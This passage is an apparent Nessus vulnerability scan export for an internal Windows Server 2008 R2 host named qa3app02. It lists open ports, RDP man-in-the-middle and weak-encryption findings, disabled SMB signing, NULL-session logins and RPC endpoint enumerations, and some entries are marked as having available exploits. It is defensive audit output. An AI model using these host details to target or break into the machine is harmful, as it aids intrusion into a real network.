CGI directories. +Based on the response to an OPTIONS request : + + - HTTP methods GET HEAD POST TRACE OPTIONS are allowed on : + + / + + + + +Each ethernet MAC address starts with a 24-bit 'Organizationally Unique Identifier'. +These OUI are registered by IEEE. +ethernet_manufacturer.nasl +2011/03/27 +Ethernet Card Manufacturer Detection +2009/02/19 +combined +None +$Revision: 1.9 $ +http://standards.ieee.org/faqs/OUI.html +http://standards.ieee.org/regauth/oui/index.shtml +n/a +The manufacturer can be deduced from the Ethernet OUI. + +The following card manufacturers were identified : + +00:50:56:81:01:db : VMware, Inc. + + + +According to the MAC address of its network adapter, the remote host is a VMware virtual machine. + +Since it is physically accessible through the network, ensure that its configuration matches your organization's security policy. +vmware_detect.nasl +2011/03/27 +VMware Virtual Machine Detection +2005/10/27 +combined +None +$Revision: 1.24 $ +n/a +The remote host seems to be a VMware virtual machine. + + +13818 +CVE-2005-1794 +5.1 +4.6 +CVSS2#E:F/RL:W/RC:ND +CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P +The remote version of the Remote Desktop Protocol Server (Terminal Service) is vulnerable to a man-in-the-middle (MiTM) attack. The RDP client makes no effort to validate the identity of the server when setting up encryption. An attacker with the ability to intercept traffic from the RDP server can establish encryption with the client and server without being detected. A MiTM attack of this nature would allow the attacker to obtain any sensitive information transmitted, including authentication credentials. + +This flaw exists because the RDP server stores a hardcoded RSA private key in the mstlsapi.dll library. Any local user with access to this file (on any Windows system) can retrieve the key and use it for this attack. +true +Exploits are available +tssvc_mim.nasl +17131 +2012/03/30 +Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness +2005/06/01 +remote +Medium +$Revision: 1.23 $ +http://www.oxid.it/downloads/rdp-gbu.pdf +http://www.nessus.org/u?e2628096 +http://technet.microsoft.com/en-us/library/cc782610.aspx +- Force the use of SSL as a transport layer for this service if supported, or/and +- Select the 'Allow connections only from computers running Remote Desktop with Network Level Authentication' setting if it is available. +It may be possible to get access to the remote host. +2005/05/28 +OSVDB:17131 + + +The remote web server uses its default welcome page. It probably means that this server is not used at all or is serving content that is meant to be hidden. +www_default_page.nasl +2117 +2011/08/12 +Web Server Unconfigured - Default Install Page Present +2003/03/20 +remote +None +$Revision: 1.37 $ +Disable this service if you do not use it. +The remote web server is not configured or is not properly configured. +1994/01/01 +OSVDB:2117 + +The default welcome page is from IIS. + + + +The remote host is running a TCP-based .NET Remoting Channel Service, aka a 'TCP channel'. .NET Remoting is an API developed by Microsoft and used for interprocess communications, and a channel service provides the mechanism by which such communications occur. Two channel services are supplied as part of Microsoft's .NET Framework - a TCP channel, which uses binary payloads, and an HTTP channel, which uses SOAP by default. +dotnet_remoting_services_detect.nasl +2011/03/11 +TCP Channel Detection +2007/01/17 +remote +None +$Revision: 1.8 $ +http://msdn2.microsoft.com/en-us/library/72x4h507.aspx +http://en.wikipedia.org/wiki/.NET_Remoting +Limit incoming traffic to this port if desired. +A TCP channel is listening on the remote host. + + +cpe:/o:microsoft:windows +This script attempts to connect to the remote host via RDP (Remote Desktop Protocol) and attempts to take a screenshot of the login screen. + +While this is not a vulnerability by itself, some versions of Windows display the names of the users who can connect and which ones are connected already. +rdp_logon_screen.nbin +2013/05/08 +RDP Screenshot +2013/04/22 +remote +None +$Revision: 1.4 $ +n/a +It is possible to take a screenshot of the remote login screen. +It was possible to gather the following screenshot of the remote login screen. +293713fa5c0d44310392df3bf9c784a3 + + +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services service is not configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app02' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.22 resolves as qa3app02. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.22 : +172.16.138.174 +172.16.138.2 +10.31.112.22 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP02\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 7001/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 10002/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP02 = File Server Service + QA3APP02 = Computer name + RB = Workgroup / Domain name + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:db + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49188 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49188 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49156 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49156 +IP : 10.31.112.22 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49156 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49155 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49155 +IP : 10.31.112.22 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP02 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP02 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP02 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07EDB0 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07EDB0 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-eeb720d97c5ca4a9b8 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-d18362d79e7c361549 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc033B7D1 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-a27e54eed83bf938d7 + +Object UUID : 283aaff4-5f60-46df-aa21-95466d1abbff +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-206d529862ba1fa65a + +Object UUID : b98fdfdd-5078-4409-8e9f-46b41bc8828d +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-206d529862ba1fa65a + +Object UUID : d25b706e-5e05-4091-a605-1bd50b5860f5 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-206d529862ba1fa65a + +Object UUID : 1c6fbc93-987c-4f26-93c4-e7dadefe7cca +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed 